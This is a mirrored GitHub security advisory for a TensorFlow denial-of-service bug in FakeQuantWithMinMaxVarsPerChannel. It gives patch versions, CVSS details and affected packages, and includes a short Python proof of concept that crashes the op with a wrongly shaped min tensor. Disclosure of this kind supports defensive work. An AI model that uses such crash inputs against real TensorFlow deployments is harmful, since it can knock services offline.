TensorFlow vulnerable to `CHECK` fail in `FakeQuantWithMinMaxVarsPerChannel`

描述

Impact

If FakeQuantWithMinMaxVarsPerChannel is given min or max tensors of a rank other than one, it results in a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf

num_bits = 8
narrow_range = False
inputs = tf.constant(0, shape=[4], dtype=tf.float32)
min = tf.constant([], shape=[4,0,0], dtype=tf.float32)
max = tf.constant(0, shape=[4], dtype=tf.float32)
tf.raw_ops.FakeQuantWithMinMaxVarsPerChannel(inputs=inputs, min=min, max=max, num_bits=num_bits, narrow_range=narrow_range)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

基本資訊

類型
reviewed
嚴重度
medium
GitHub 上的公告
開啟公告 ↗
儲存庫公告
開啟儲存庫公告 ↗
原始碼
瀏覽原始碼 ↗
公開(公告)
2022-09-16 21:13:43 UTC
更新時間
2023-01-28 05:03:01 UTC
GitHub 審核
2022-09-16 21:13:43 UTC
NVD 公開
2022-09-16

EPSS Score

Score Percentile
0.06% 19.80%

CVSS Scores

Base score Version Severity Vector
5.9 3.1
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 點擊展開
攻擊向量 (AV:N)
可經網際網路或企業內可路由網段從遠端觸達,攻擊者不必在裝置旁邊。
攻擊複雜度 (AC:H)
即使網路可達,也常要卡時間窗、負載或特定版本組合才打得響。
權限需求 (PR:N)
不必事先登入或提權,匿名工作階段也可能成為跳板。
使用者互動 (UI:N)
不必受害者點連結、放行巨集或安裝軟體,攻擊鏈可自動走完。
作用域 (S:U)
破壞局限在脆弱元件原本的安全權限與信任域之內。
機密性影響 (C:N)
幾乎談不上實質的敏感資料外洩。
完整性影響 (I:N)
對紀錄真實性與不可否認性的破壞可忽略。
可用性影響 (A:H)
可造成長時間中斷、關鍵交易無法完成,或伴隨資料毀損導致難以自癒。

Identifiers

CWEs

CWE id Name
CWE-617 Reachable Assertion

Affected packages (9)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip tensorflow < 2.7.2 2.7.2
pip tensorflow >= 2.8.0, < 2.8.1 2.8.1
pip tensorflow >= 2.9.0, < 2.9.1 2.9.1
pip tensorflow-cpu < 2.7.2 2.7.2
pip tensorflow-cpu >= 2.8.0, < 2.8.1 2.8.1
pip tensorflow-cpu >= 2.9.0, < 2.9.1 2.9.1
pip tensorflow-gpu < 2.7.2 2.7.2
pip tensorflow-gpu >= 2.8.0, < 2.8.1 2.8.1
pip tensorflow-gpu >= 2.9.0, < 2.9.1 2.9.1

References

cvelogic Threat Intelligence